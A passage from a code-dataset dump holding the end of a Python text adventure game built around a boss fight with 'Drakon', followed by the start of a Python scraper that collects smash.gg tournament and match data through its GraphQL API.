,▄▓▓▀╠▓███████▒░░\"░╠╟▌▄▄▄▄╬╩░░░φ█████████▓▌ ▀▄\n ╓▀─ ▄█▀▓████████▌░░░░≥╚▓▓▓▌Å░░░╔▓██████▓^~╙╙▀▄ └╕\n ,¬ ▄▀└╓▀▓█████████▓▓▓▄▒╠╥,▄▓▓█▓▓█████████▓▄ ▀\n ▓─ Æ.█████▀ ▀███▓▄╬▀████╬▓▓██████▀╙▀███▓─\n └ ' ▓███▀ ╟█████▓██████╣████¬ └███▌\n ╫▓██╙ ╟███████████████⌐ ╟██╠▒\n @╣█▌ ╙██████████████▓▄▄, ▓╬▓╬╕\n ╬╬▓▌ ╟████████████▌██████▓▄▀███▄\n ╬╠██▀ ,#▓▓███▓▓▓█████▓▄▄▀█████▓╬╬╬▓▌\n ▒╬╬█▄ ╣▓▀██▓╬▓████▓▒▒╬██▓ ╙▀██████▓▓^\n ╚╘██╬╬µ ▄▓╙╬▓█████████╬█▓▓▓▓▌ └╙▀▀╟\n ¬▓█▓╢ ███▓██▓▓▒▒╠░╠▒╟▓▌▓╬███▄\n ╙██▄ ╫███████████▓█▓█████████▄\n ╙██▄ ▓█████████████████████████\n █╬▌µ██████████████████████▓▓██▒\n ▓█╬╬▓████████████████████▓▓▓█▌\n ╬╠╬╬███j████████╟██▌██████╬╬▓Γ\n ▒╠▓██ ` ╚└█╝╙█▀▌▐╣█ Γ█▌▀███▒╬\n ▐▓╬█▌▀⌐ ╟ ╙▌ ▐▌ █ ██░▒µ\n ▓█▓█ ¬ └ └ ████▌\n ''')\n print('\\n')\n print(f\"As you enter the castle, you get a trickling feeling down your spine. Something is clearly off...\")\n time.sleep(2)\n print(f\"Step by step you make ur way up the castle\")\n time.sleep(2)\n print(f\"Drakon: Who dares step foot here?\")\n time.sleep(2)\n print(f\"*Deep gulp. \\n{character['Name']}: The person who will put an end to the suffering you caused on Entia\")\n time.sleep(2)\n print(f\"Drakon: MWAHAHAHAHA... Don't make me laugh...\")\n print(f\"What's your move?\")\n for index in enumerate(character['Move_Set']):\n print(index)\n user_choice = int(input(''))\n print(f'You chose', list(character[\"Move_Set\"].keys())[user_choice])\n time.sleep(2)\n print(f'Drakon: PATHETIC!')\n time.sleep(2)\n print(f'Drakon: Let me show you what true power looks like')\n time.sleep(2)\n print(f'\\n\\nDrakon uses Spacial Magic: Eternal Space')\n time.sleep(2)\n print(f'\\n\\nYou feel the ground shaking from below and notice cracks start to form on the floor. Everything begins to shake...')\n time.sleep(5)\n print(f'Drakon: WELCOME TO MY DOMAIN')\n time.sleep(2)\n print(f'You feel weak! Your attacks do half damage to Drakon... Annoying!')\n time.sleep(1)\n while enemy['Current_HP'] > 100:\n print(character)\n if character['Current_HP'] < 0:\n print(f'GAME OVER! Drakon still reigns over the land and your story comes to an unfortunate end...')\n print(f'\\nThanks for playing!')\n sys.exit()\n print(\"What's your move?\")\n for index in enumerate(character['Move_Set']):\n print(index)\n user_choice = int(input(''))\n if user_choice == 0:\n print(f'You ran away! What a bummer...')\n print(f\"You lose {enemy['Attack']} HP\")\n character['Current_HP'] -= enemy['Attack']\n return None\n elif user_choice < len(character['Move_Set'].keys()):\n move = (character['Move_Set'][list(character['Move_Set'].keys())[user_choice]]) // 2\n enemy['Current_HP'] -= move\n print(f'You dealt', move, 'Damage!')\n if random.randint(0, 1) == 1:\n character['Current_HP'] -= enemy['Attack']\n print(f\"{enemy['Name']} dealt {enemy['Attack']} damage!\")\n else:\n print(f\"{enemy['Name']} missed!\")\n else:\n print(f\"Invalid selection, please select a number from the move set\")\n print(f'\\n\\nDrakon: ARGH')\n time.sleep(2)\n print(f\"{character['Name']}: It's time to put an end to this\")\n time.sleep(2)\n print(f\"Drakon: IT'S\")\n time.sleep(2)\n print(f\"Drakon: NOT\")\n time.sleep(2)\n print(f\"Drakon: OVER\")\n time.sleep(2)\n print(f\"\\n\\nDrakon Uses: ᚷᛁᚨᚾᛏ ᚠᛟᚱᛗᚢᛚᚨ\\n\\n\")\n time.sleep(2)\n print('''\n\n , ▓█\n ╗▌ ▐██▓\n ▐⌐ ]. ╓█▌]███▓▌ ]▌ ║▄\n ▓▌ ╓█▒ ]██▒█████▓▌ ╟█▌ █▓▌\n ▐█▓▒ ╔██▌]██▓▓█████▓▓▌██▓▌ ╫█▓▓▌\n ╓██▓▓▄███▓███▓██████▓▓▓██▓▓▄██▓▓▓▌\n ] ▄███▓████████████████▓▓▓▓█▓▓▓██▓▓▓▓▒\n ▓▒▐██████████████████████▓▓▓▓▓▓▓▓█▓▓▓▓▓ ]╕\n ╟█▌███████████████████████▓▓▓▓▓▓▓▓█▓▓▓▓▓▌ ]█▒\n j██▓███████████████████████▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▄█▓▒ ,╕\n ▓██▓██████████████████████▓▓▓▓▓▓▓▓█▓▓▓▓▓▓▓██▓▒ ▄█⌐\n ╓ ]███████████████████████████▓▓▓▓▓▓▓█▓▓▓▓▓▓▓▓▓▓▒▓█▓\n ╙█,╟███████████████████████████▓▓▓▓▓▓▓█▓█▓▓▓▓█▓▓▓██▓▓\n \"██▓█╬██████████▓▒╠╠╠▀╬████████▓▓▓▓█▓╨▀██▓▓▓█▓▓▓██▓▓▌\n ╟▌░████╬█████▓█╬▒╠╠╠╠╠╠╠╠╠░▒█████▓▓▓▓█╩ └ ╙███▓╬▀▀╩╫▓\n ██▓█████████▓▒╠╠╠╠╠╠╠╠╠╠╠╠╠╠╣███▓▓▀▐╙ ▐▓▓▓▓▌░╟▓,▄∩\n ╙███████████▌╠╠╠╠╠╠╠╠╠╠╠╠╠╠╠╠╠▀▓▓└ ╠╠█▓█▓║▓█▓┘\n ██████████╬░░╠╠╠╠╠╠╠╠╠╠╠╠╠╠╠╠╠╠ ╠╠▓██��▓█▌,,\n ╙███████▌╠╠╠▒╠╠╠╠╠╠╠╠╠╠╠╠╠╠╠╠╠╠⌐ ╙╠╣█▓▓▓██▓╙\n '▓█████▌▒╣▒╠╔╠╠╠╠╠╠▒╠╠φ╦╚░╠╩░▒▒▒ε . \"\" └╠╬█▓▓▓╨\n .φ╠╙▀██╬╠╫█▒╠╠▄▓▓██▓█▓▄▒╩╩░▒▒▒▒▒╠╔░ ,╓φφφφ╔, ╠╣█▓░\n ╔╠╙╣▒▒╖╙▀╠▒╬█████╬╬╬▓▒╙╙██▒╚▒▒▒▒╠╠╠╓▒███▀▀███▄█▀░▒,»\n ⁿ╠░╬╠▒╬▒╠╦╠╠╠▀███╬▓████▒╠╠█▒░╚▒╠╠]╠╠╟█╬╬▄██▄╓██▒▐▓╙╚ '\n ╚╠╦ └╙▀▒╠╠╩╠╠╠██▓▓████░╠▒██▄≥░╠╠╠╩╣█╬▓╠████▒╣█╠╠▒▄ '\n `╚╠╦▒╠╠╠╠░╠╠╠░╣██╬╬▓▓▓▓█▌░░░╙╓,┐~╙██╬▓╬╬╬▒▄█▌╠╩╬,⌐\n \"╙╙\"╚╠╬╫▄▒╠░╬╬╬╬╬╬░╩╙╔╠▒╙ .\"'^Ç ╨▀▀▀▀▀╨╙]╠φ╬ε\n '╠╠╠▓█▌╠╠╠╠╠▒▒▒▒╠╠╠½∩ ▓ ⌐ └└ ,▄╛╚▄Γ\n `╠╠╠███▄╓╠╠╠▒╠▒╠╠'╫▒ ,╙,░ ╠▒▓▓█\" ▐╚∩\n `╠╠╠╬███▓▒▒▒╠╠╠╠▒╠╠Γ'^^`^^\"\"\"j█▀╠└ ╔▓▓▒▒\n ]╠╠╠╠░╬██████████▓▄▄▓▓▓▓▓▓▓▓█▌╠╙ `╫▓╩\n └╠▒╙╚╠▒████▓███████▓█▓█▓██▀└]╠'\n ╚▒╠╠╠█████████████████▌ ≤╙\n ╓▄▄▄▓██████▌╠░▀██████████████▀¿\n ,▄▓██████▀▀▀█╙╝▀█▓▒╠╠░╬╬╬░,╓,╙╙╙└╓███▓▄\n ╙?██▒╠╠░╠╠╠╠╙╙╙░ ,╙\" └^ └\n .█▒\"▒╠╠╠╠╠╡ .\n .▓▌ \"██▄╩╠╠▒╓╓»≈~\n ]█▒ !███ █▌\n ╟▌ ▄███▄ ╫▒\n j▌▐█████▓░╫,\n ,█▐█╩ ╙██▌█\n `██▌ █▒█▌\n 7█╟█ .█╩▓█⌐\n ╟▄ .█\n .█, ╟▒\n .█. ╟▌\n ▀ '▀\n ''')\n time.sleep(2)\n print(f\"\\n\\nDrakon is in his giant form. His hits deal a lot of damage, but he has a low chance of hitting. \"\n f\"You feel a rush of fury over you! Your attacks do normal damage and you gain a x2 health boost\")\n enemy['Current_HP'] = enemy['Max_HP'] * 3\n enemy['Attack'] = 119\n character['Current_HP'] = character['Max_HP'] * 2\n while enemy['Current_HP'] > 0:\n if character['Current_HP'] <= 0:\n print(f'GAME OVER! Drakon still reigns over the land and your story comes to an unfortunate end...')\n print(f'\\nThanks for playing!')\n sys.exit()\n print(\"What's your move?\")\n for index in enumerate(character['Move_Set']):\n print(index)\n user_choice = int(input(''))\n if user_choice == 0:\n print(f'You ran away! What a bummer...')\n print(f\"You lose {enemy['Attack']} HP\")\n character['Current_HP'] -= enemy['Attack']\n return None\n elif user_choice < len(character['Move_Set'].keys()):\n move = (character['Move_Set'][list(character['Move_Set'].keys())[user_choice]]) // 2\n enemy['Current_HP'] -= move\n character['Current_HP'] -= enemy['Attack']\n print(f'You dealt', move, 'Damage!')\n print(f'')\n if random.randint(0, 1) == 1:\n character['Current_HP'] -= enemy['Attack']\n print(f\"{enemy['Name']} dealt {enemy['Attack']} damage!\")\n else:\n print(f\"{enemy['Name']} missed!\")\n else:\n print(f\"Invalid selection, please select a number from the move set\")\n print(f\"Drakon: HOW\")\n time.sleep(2)\n print(f\"{character['Name']}: Your reign ends here Drakon. Entia wont have to worry about you any longer\")\n time.sleep(2)\n call = list(itertools.repeat('DAMN IT', 10))\n string = ''\n for index in call:\n string += ' ' + index\n\n print(string)\n time.sleep(2)\n print(f\"What's your move?\")\n for index in enumerate(character['Move_Set']):\n print(index)\n user_choice = int(input(''))\n print(f'You chose', list(character[\"Move_Set\"].keys())[user_choice])\n time.sleep(2)\n print(f'Drakon: ARRGHHHHH')\n character['Boss_Status'] = 'Dead'\n return None\n\n\ndef check_if_goal_attained(character: dict) -> bool:\n \"\"\"\n checks if the user has beaten the boss\n\n :param character: character is a dictionary\n :precondition: character must be a dictionary\n :postcondition: will check if the user beat the boss\n :return: a boolean value depending on if the boss is dead or not\n >>> check_if_goal_attained({'Boss_Status': 'Dead'})\n True\n >>> check_if_goal_attained({'Boss_Status': 'Not Dead'})\n False\n >>> check_if_goal_attained({'Boss_Status': 'Chicken Noodle Soup'})\n False\n \"\"\"\n if character['Boss_Status'] == 'Dead':\n return True\n else:\n return False\n\n\ndef character_has_leveled(character: dict) -> bool:\n \"\"\"\n checks if the character has leveled up\n\n :param character: a dictionary\n :precondition: character must be a dictionary\n :postcondition: will let the player know that they leveled up\n :return: a boolean value depending on if the character has leveled up\n >>> character_has_leveled({'Name': 'PLACEHOLDER', 'XP': 501, 'Level': 1})\n ▄█ ▄████████ ▄█ █▄ ▄████████ ▄█ ███ █▄ ▄███████▄\n ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███\n ███ ███ █▀ ███ ███ ███ █▀ ███ ███ ███ ███ ███\n ███ ▄███▄▄▄ ███ ███ ▄███▄▄▄ ███ ███ ███ ███ ███\n ███ ▀▀███▀▀▀ ███ ███ ▀▀███▀▀▀ ███ ███ ███ ▀█████████▀\n ███ ███ █▄ ███ ███ ███ █▄ ███ ███ ███ ███\n ███▌ ▄ ███ ███ ███ ███ ███ ███ ███▌ ▄ ███ ███ ███\n █████▄▄██ ██████████ ▀██████▀ ██████████ █████▄▄██ ████████▀ ▄████▀\n ▀ ▀\n Great job PLACEHOLDER! You are one step away from Drakon.\n True\n \"\"\"\n if character['XP'] >= 500:\n print(' ▄█ ▄████████ ▄█ █▄ ▄████████ ▄█ ███ █▄ ▄███████▄ \\n'\n '███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ \\n'\n '███ ███ █▀ ███ ███ ███ █▀ ███ ███ ███ ███ ███ \\n'\n '███ ▄███▄▄▄ ███ ███ ▄███▄▄▄ ███ ███ ███ ███ ███ \\n'\n '███ ▀▀███▀▀▀ ███ ███ ▀▀███▀▀▀ ███ ███ ███ ▀█████████▀ \\n'\n '███ ███ █▄ ███ ███ ███ █▄ ███ ███ ███ ███ \\n'\n '███▌ ▄ ███ ███ ███ ███ ███ ███ ███▌ ▄ ███ ███ ███ \\n'\n '█████▄▄██ ██████████ ▀██████▀ ██████████ █████▄▄██ ████████▀ ▄████▀ \\n'\n '▀ ▀ ')\n character['XP'] -= 500\n character['Level'] += 1\n if character['Level'] == 3:\n print(f\"Great job {character['Name']}! The cloudy skies start to darken at Drakon's Castle (4, 3)\"\n f\" Its time to put an end to the wrath put down on Entia.\")\n return True\n else:\n print(f\"Great job {character['Name']}! You are one step away from Drakon.\")\n return True\n\n\ndef execute_glow_up_protocol(character: dict) -> dict:\n \"\"\"\n updates the character stats once the character levels up\n\n :param character: a dictionary\n :precondition: character must be a dictionary\n :postcondition: updates the characters stats once the player levels up\n :return: a dictionary containing character information with updates stats\n >>> execute_glow_up_protocol({'Class': 'Samurai', 'Current_HP': 0, 'Max_HP': 0, 'Attack': 0, 'Defence': 0})\n {'Class': 'Samurai', 'Current_HP': 56, 'Max_HP': 56, 'Attack': 35, 'Defence': 12}\n >>> execute_glow_up_protocol({'Class': 'Sorcerer', 'Current_HP': 0, 'Max_HP': 0, 'Attack': 0, 'Defence': 0})\n {'Class': 'Sorcerer', 'Current_HP': 48, 'Max_HP': 48, 'Attack': 40, 'Defence': 11}\n \"\"\"\n if character['Class'] == 'Samurai':\n character['Current_HP'] += 56\n character['Max_HP'] += 56\n character['Attack'] += 35\n character['Defence'] += 12\n elif character['Class'] == 'Berserker':\n character['Current_HP'] += 67\n character['Max_HP'] += 67\n character['Attack'] += 27\n character['Defence'] += 21\n elif character['Class'] == 'Sorcerer':\n character['Current_HP'] += 48\n character['Max_HP'] += 48\n character['Attack'] += 40\n character['Defence'] += 11\n elif character['Class'] == 'Elementalist':\n character['Current_HP'] += 73\n character['Max_HP'] += 73\n character['Attack'] += 25\n character['Defence'] += 18\n elif character['Class'] == 'Paladin':\n character['Current_HP'] += 165\n character['Max_HP'] += 165\n character['Attack'] += 20\n character['Defence'] += 28\n return character\n\n\ndef game():\n \"\"\"\n game loop\n\n :return: None\n \"\"\"\n print(f\"In the vast world of Entia, there was always peace an unity.\"\n f\"\\nEveryone worked together to create 'Entia Capital City', a place where everyone could live in peace\"\n f\"\\nHowever, all was not as peaceful as it seemed. Those who lived in the forest did not receive equal treatment\"\n f\"\\nThis was because they were different than the others.\"\n f\"\\nThey were often called 'Demons' because of their looks.\"\n f\"\\nDespite the inequality, they did not do anything about it\"\n f\"\\nThat was until one day, a boy named 'Drakon' was born.\"\n f\"\\nGrowing up, Drakon despised the inequality. He hated it so much...\"\n f\"\\nHe chose to become an educator amongst the 'demons'.\"\n f\"\\nThat was until one day his father was wrongfully killed by the Entian Royal Guards.\"\n f\"\\nHis eyes filled with rage and he killed the guards, barely surviving in the process\"\n f\"\\nWith the blood on the floor, One of the guards, with his dying breath, drew a scripture on the floor\"\n f\"\\nIt summoned a demon, but unbeknownst to the guard, the demon would not be killing Drakon.\")\n time.sleep(15)\n print(f\"\\nIt\")\n time.sleep(1)\n print(f\"\\nWould\")\n time.sleep(1)\n print(f\"\\nKill\")\n time.sleep(1)\n print(f\"\\nHim.\")\n time.sleep(1)\n print(f\"\\nThe demon locked eye contact with Drakon and negotiated a deal\"\n f\"\\nDemon: If you sign a contract with me, I will lend you my powers\"\n f\"\\nDrakon: What's the catch\"\n f\"\\nDemon: You kill every single person in Entia\"\n f\"\\nWithout hesitating, Drakon agreed to the contract\"\n f\"\\nHe felt a rush of evil energy coursing through his veins\"\n f\"\\nHe walked slowly towards the capital city\"\n f\"\\nHe killed everyone on sight\"\n f\"\\nNot even the heroes of the city could stop him\"\n f\"\\nOne hero decided to run away, running to the most isolated area of Entia\"\n f\"\\nHe ran to Stowry Village\"\n f\"\\nThat's when he met you, a strongest warrior of Stowry.\"\n f\"\\nHe saw promise, and even trained you.\"\n f\"\\nHe explained the situation on his deathbed, 12 months after training\"\n f\"\\nHis dying wish was\")\n time.sleep(10)\n print(f'\\nStop')\n time.sleep(1)\n print(f\"Drakon\\n\\n\\n\\n\\n\\n\")\n rows = 5\n columns = 5\n board = make_board(rows, columns)\n character = make_character()\n player_stats(character)\n player_move_set(character)\n achieved_goal = False\n describe_current_location(board, character)\n while not achieved_goal:\n direction = get_user_choice()\n valid_move = validate_move(character, direction)\n if valid_move:\n move_character(character, direction)\n describe_current_location(board, character)\n there_is_a_challenge = check_for_challenges(character)\n if there_is_a_challenge:\n execute_challenge_protocol(character)\n if character_has_leveled(character):\n execute_glow_up_protocol(character)\n player_move_set(character)\n achieved_goal = check_if_goal_attained(character)\n else:\n print('Invalid direction! Try again... ')\n print(f'GAME OVER: GOOD ENDING! \\nYou beat Drakon and brought peace to Entia')\n\n\ndef main():\n game()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"mnkhee/assignment-4-mnkhee","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":45645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"21629166732","text":"import itertools\nimport json\nimport logging\nimport time\nfrom datetime import datetime\nfrom urllib.error import HTTPError\n\nimport typing\nfrom graphqlclient import GraphQLClient\n\nfrom ranking_scraper.gql_query import GraphQLQuery\nfrom ranking_scraper.model import Game, Event, EventState, EventType, EventFormat, Set, Player\nfrom ranking_scraper.smashgg import queries\nfrom ranking_scraper.config import get_config\nfrom ranking_scraper.scraper import Scraper\n\n_l = logging.getLogger(__name__)\n\nSMASHGG_API_ENDPOINT = 'https://api.smash.gg/gql/alpha'\n\n# Maps smash.gg event type (int) to our internal event type (enum; backed by int).\nEVENT_TYPE_ENUM_MAP = {1: EventType.SINGLES.value,\n 5: EventType.DOUBLES.value, }\n\n\nclass SmashGGScraper(Scraper):\n def __init__(self,\n session=None,\n api_token: str = None,\n max_requests_per_min=80,\n object_limit=1000):\n super(SmashGGScraper, self).__init__(session=session)\n self._client = GraphQLClient(endpoint=SMASHGG_API_ENDPOINT)\n self._client.inject_token(f'Bearer {api_token or get_config()[\"smashgg_api_token\"]}')\n self._req_times = [0 for _ in range(max_requests_per_min)]\n self._req_idx = 0 # type: int\n self.object_limit = object_limit\n\n # API interaction\n def submit_request(self,\n query: GraphQLQuery,\n params: dict = None,\n include_metadata=False) -> dict:\n \"\"\"\n Submit a query request to the smash.gg API.\n\n :return: The response data in dictionary format (parsed as json). The response metadata\n is not returned unless \"include_metadata\" is set to True. In such a case, any data is\n under the \"data\" key. (effectively, the response is returned as-is).\n :rtype: dict\n \"\"\"\n params = params or dict()\n _l.debug(f'> Executing query \"{query.query_name}\".')\n result = self._execute_request(query.build(), params) # str\n result = json.loads(result)\n # Ignore metadata and just return the requested data.\n try:\n return result if include_metadata else result[\"data\"]\n except KeyError:\n _l.error(f'Result did not contain \"data\" key. Result is: {result}')\n raise\n\n def _execute_request(self,\n query: str,\n params=None,\n max_retries: int = 5,\n initial_wait_time: int or float = 1.5,\n max_wait_time: int or float = 60.0):\n \"\"\"\n Executes the graphQL request with exponential back-off.\n\n :param query: The graphQL query in string format.\n :type query: str\n\n :param params: Parameters for the request. If not provided, an empty\n dict is given.\n :type params: dict\n\n :param max_retries: Maximum number of times to retry. Default: 5 . A value lower than 0 is\n treated as 0.\n :type max_retries: int\n\n :param max_wait_time: Maximum amount of time, in seconds) to wait.\n Default: 60.0 .\n :type max_wait_time: int or float\n\n :return: The response string.\n :rtype: str\n \"\"\"\n wait_time = initial_wait_time\n max_retries = max(max_retries, 0) # Ensure no negative value\n for attempt_nr in range(max_retries + 1): # Initial try + max_retires\n try:\n return self._client.execute(query=query,\n variables=params or dict())\n except HTTPError as http_err:\n if http_err.code != 429: # 429 = Too Many Requests\n raise http_err\n if attempt_nr >= max_retries: # Too many retries have failed.\n raise http_err\n # Note: 400 (bad request) can be given to indicate too high\n # complexity for a request.\n wait_time *= 2.0\n _l.warning(f\"Too many requests (429). Waiting {wait_time:.1f}\"\n f\" seconds before resuming.\")\n time.sleep(min(wait_time, max_wait_time))\n continue\n\n # Scraping methods\n def pull_event_data(self,\n game_code: str,\n from_dt: datetime,\n to_dt: datetime = None,\n countries: typing.List[str] = None) -> typing.List[Event]:\n \"\"\"\n Retrieve events for a given game in a given time frame.\n\n Optionally limit the query to a list of countries (defined by country codes).\n\n This will only retrieve tournament & their events, it will not populate the set data.\n\n :return: List of new events that have been added.\n \"\"\"\n to_dt = to_dt or datetime.utcnow()\n countries = countries or [None] # Note: list of None, not just list\n game = self.session.query(Game).filter(Game.code == game_code).one()\n _l.info('### Retrieving event data ###')\n found_events = list()\n for country_code in countries:\n found_events.extend(self._get_events(game,\n from_dt=from_dt,\n to_dt=to_dt,\n country_code=country_code))\n # 2. Check for any existing Event in database already (discard if existing).\n new_events = self._filter_out_known_events(found_events)\n _l.info(f'Retrieved {len(found_events)} events, containing {len(new_events)} new events. '\n f'({len(found_events) - len(new_events)} events are already known)')\n self.session.add_all(new_events)\n _l.info('### Populated database with new Event instances ###')\n self.session.commit()\n return new_events\n\n def populate_event(self, event: Event) -> typing.List[Set]:\n \"\"\"\n Populates an event's set data.\n\n Updates the event's format and state.\n\n :return: The list of created Sets.\n \"\"\"\n _l.info(f'Populating event {event.name}')\n if event.is_populated:\n _l.warning(f'Not populating event {event.name}. It is already populated.')\n return list()\n if event.type == EventType.DOUBLES or event.type == EventType.UNKNOWN:\n error_msg = f'SKIPPING - EventType {event.type.name} is currently not supported.'\n _l.warning(error_msg)\n return list()\n _q = queries.get_event_phases(event.sgg_event_id)\n phases_data = self.submit_request(query=_q)['event']['phases']\n event.format = _find_event_format(phases_data) # Update event format\n set_dicts = self._get_phase_sets_data(phases_data=phases_data)\n sets = self._create_sets_from_set_dicts(event=event, set_dicts=set_dicts)\n self.session.add_all(sets)\n self.session.commit()\n return sets\n\n def populate_events(self, events: typing.List[Event]) -> typing.List[Set]:\n return list(itertools.chain(*(self.populate_event(_e) for _e in events)))\n\n def _get_events(self, game: Game, from_dt: datetime, to_dt: datetime,\n country_code: str = None) -> typing.List[Event]:\n \"\"\"\n Fetches all events for a game from a specific time period.\n\n Optionally limits the retrieval to a specific country.\n\n :return: A dictionary of events found in all tournaments that match the given criteria.\n \"\"\"\n from_dt = int(from_dt.timestamp())\n to_dt = int(to_dt.timestamp())\n _l.info(f'Retrieving tournament data for '\n f'\"{country_code if country_code else \"all countries\"}\".')\n _q = queries.get_completed_tournaments_paging(game_id=game.sgg_id,\n country_code=country_code,\n from_date=from_dt,\n to_date=to_dt)\n page_info = self.submit_request(query=_q)['tournaments']['pageInfo']\n tournament_dicts = list()\n for page_nr in range(1, page_info['totalPages'] + 1):\n _l.info(f'Retrieving page {page_nr} of {page_info[\"totalPages\"]}')\n _q = queries.get_completed_tournaments(game_id=game.sgg_id,\n page_nr=page_nr,\n country_code=country_code,\n from_date=from_dt,\n to_date=to_dt)\n _nodes = self.submit_request(query=_q)['tournaments']['nodes']\n tournament_dicts.extend(_nodes)\n # Sanity check: duplicate tournament retrieval check\n if len({t['id'] for t in tournament_dicts}) != len(tournament_dicts):\n _l.error(\n f'Duplicate tournament data retrieved! This is likely an error with the query. '\n f'Skipping further processing of these events. '\n f'(Country code: {country_code}, # of tournaments: {len(tournament_dicts)}')\n return list() # TODO: Perhaps safe to merge and process anyway?\n events_list = (self._create_events_from_tournament_dict(td, game)\n for td in tournament_dicts)\n new_events = [_ for _ in itertools.chain(*events_list)]\n return new_events\n\n def _create_events_from_tournament_dict(self,\n tournament_dict: dict,\n game: Game) -> typing.List[Event]:\n new_events = list()\n for evt_data in tournament_dict['events']:\n event_fullname = f'{tournament_dict[\"name\"]} | {evt_data[\"name\"]}'\n if evt_data['state'] != 'COMPLETED':\n _l.debug(f'SKIPPING - event not completed ({event_fullname})')\n continue\n if evt_data['isOnline'] is True:\n _l.debug(f'SKIPPING - event is online competition ({event_fullname})')\n continue\n if evt_data['videogame']['id'] != game.sgg_id:\n _l.debug(f'SKIPPING - game mismatch ({event_fullname})')\n continue\n if not _validate_event_data(evt_data,\n tournament_data=tournament_dict,\n game=game,\n event_fullname=event_fullname):\n continue\n event_type_code = EVENT_TYPE_ENUM_MAP.get(evt_data['type'], EventType.UNKNOWN.value)\n new_event = Event(sgg_tournament_id=tournament_dict['id'],\n sgg_event_id=evt_data['id'],\n game_id=game.id,\n name=event_fullname,\n country=tournament_dict['countryCode'],\n num_entrants=evt_data['numEntrants'],\n end_date=datetime.fromtimestamp(tournament_dict['endAt']),\n note='Added by SmashGGScraper',\n format_code=EventFormat.UNKNOWN.value,\n type_code=event_type_code,\n state_code=EventState.UNVERIFIED.value,\n )\n new_events.append(new_event)\n return new_events\n\n def _filter_out_known_events(self, events: typing.List[Event]) -> typing.List[Event]:\n new_events = list()\n tournament_ids = [evt.sgg_tournament_id for evt in events]\n known_events = self.session.query(Event) \\\n .filter(Event.sgg_tournament_id.in_(tournament_ids)) \\\n .all()\n known_events_ids = {(e.sgg_tournament_id, e.sgg_event_id,) for e in known_events}\n for evt in events:\n if (evt.sgg_tournament_id, evt.sgg_event_id,) in known_events_ids:\n _l.debug(f'SKIPPING - event already known ({evt.name})')\n continue\n new_events.append(evt)\n return new_events\n\n def _get_phase_sets_data(self, phases_data: typing.List[dict]) -> typing.List[dict]:\n all_sets_data = list()\n for phase_dict in phases_data:\n _q = queries.get_phase_sets_paging(phase_dict['id'])\n page_count = self.submit_request(query=_q)['phase']['sets']['pageInfo']['totalPages']\n for page_nr in range(1, page_count + 1):\n _l.debug(f'Retrieving sets page {page_nr} of {page_count}')\n _q = queries.get_phase_sets(phase_dict['id'], page_nr=page_nr)\n phase_sets_data = self.submit_request(query=_q)['phase']['sets']['nodes']\n # CALL_ORDER returns in reverse order when an event is completed\n # see: https://developer.smash.gg/reference/setsorttype.doc.html\n all_sets_data.extend(phase_sets_data)\n total_set_count = len(all_sets_data)\n # Filter out DQ sets\n all_sets_data = [sd for sd in all_sets_data if not _set_data_contains_dq(sd)]\n _l.debug(f'Filtered out {total_set_count - len(all_sets_data)} sets with DQs.')\n # sortType doesn't seem to be reliable. Sorting ourselves to be sure.\n all_sets_data = sorted(all_sets_data, key=lambda sd: sd['startedAt'] or 0)\n return all_sets_data\n\n def _create_sets_from_set_dicts(self,\n event: Event,\n set_dicts: typing.List[dict]) -> typing.List[Set]:\n \"\"\"\n Creates Set and Player instances from given data for a specific Event.\n\n Players are tied to existing players if possible. If no Player instance is found, a new\n Player instance is created. This also extends to anonymous entries.\n\n If a player is unverified, it is marked as such on the set.\n \"\"\"\n known_set_ids = [data[0] for data in self.session.query(Set.sgg_id).all()]\n new_set_dicts = [set_data for set_data in set_dicts if set_data['id'] not in known_set_ids]\n _l.info(f'Processing {len(new_set_dicts)} sets. ({len(set_dicts) - len(new_set_dicts)} '\n f'sets are being skipped (IDs are already present in the system).')\n new_sets = list()\n # Track anonymous players from this tournament\n anonymous_players = dict() # type: typing.Dict[str, Player]\n for idx, set_data in enumerate(new_set_dicts):\n winning_slot, losing_slot = sorted(set_data['slots'],\n key=lambda d: d['standing']['placement'])\n # TODO: If we support teams, participants will have to be handled differently.\n winner = self._get_player_for_participant(winning_slot['entrant']['participants'][0],\n anonymous_players_map=anonymous_players)\n loser = self._get_player_for_participant(losing_slot['entrant']['participants'][0],\n anonymous_players_map=anonymous_players)\n new_set = Set(\n sgg_id=set_data['id'],\n order=idx, # Sets are ordered by call order (startedAt); see above\n event=event,\n winning_player=winner,\n winning_score=winning_slot['standing']['stats']['score']['value'],\n winning_player_is_verified=winning_slot['entrant']['participants'][0]['verified'],\n losing_player=loser,\n losing_score=losing_slot['standing']['stats']['score']['value'],\n losing_player_is_verified=losing_slot['entrant']['participants'][0]['verified'])\n new_sets.append(new_set)\n return new_sets\n\n def _get_player_for_participant(self,\n participant_data,\n anonymous_players_map: typing.Dict[str, Player]) -> Player:\n # TODO: Will this cause a new query each time? Might have to disable flush for this.\n known_players = self.session.query(Player).filter(Player.sgg_id != None).all()\n known_players = {p.sgg_id: p for p in known_players if p.sgg_id}\n user = participant_data['user']\n if user and user['id']:\n if user['id'] in known_players:\n return known_players[user['id']] # Return stored player\n # Create new tracked Player\n country = user['location']['country'] if user['location'] else None\n new_player = Player(sgg_id=user['id'],\n name=participant_data['gamerTag'],\n country=country) # country can be None (is ok)\n self.session.add(new_player)\n return new_player\n # else: this is an anonymous entry\n tag = participant_data['gamerTag']\n if tag not in anonymous_players_map:\n anon_player = Player(sgg_id=None, name=tag)\n self.session.add(anon_player)\n anonymous_players_map[tag] = anon_player\n return anonymous_players_map[tag]\n\n\ndef _validate_event_data(event_data, tournament_data, game, event_fullname=None):\n event_fullname = event_fullname or f'{tournament_data[\"name\"]} / {event_data[\"name\"]}'\n if event_data['state'] != 'COMPLETED':\n _l.debug(f'SKIPPING - event not completed ({event_fullname})')\n return False\n if event_data['isOnline'] is True:\n _l.debug(f'SKIPPING - event is online competition ({event_fullname})')\n return False\n if event_data['videogame']['id'] != game.sgg_id:\n _l.debug(f'SKIPPING - game mismatch ({event_fullname})')\n return False\n # Skip event with no or little participants\n if not event_data['numEntrants'] or event_data['numEntrants'] < 10:\n _l.debug(f'SKIPPING - no or not enough entrants ({event_fullname})')\n return False\n return True\n\n\nELIMINATION_FORMATS = {'SINGLE_ELIMINATION', 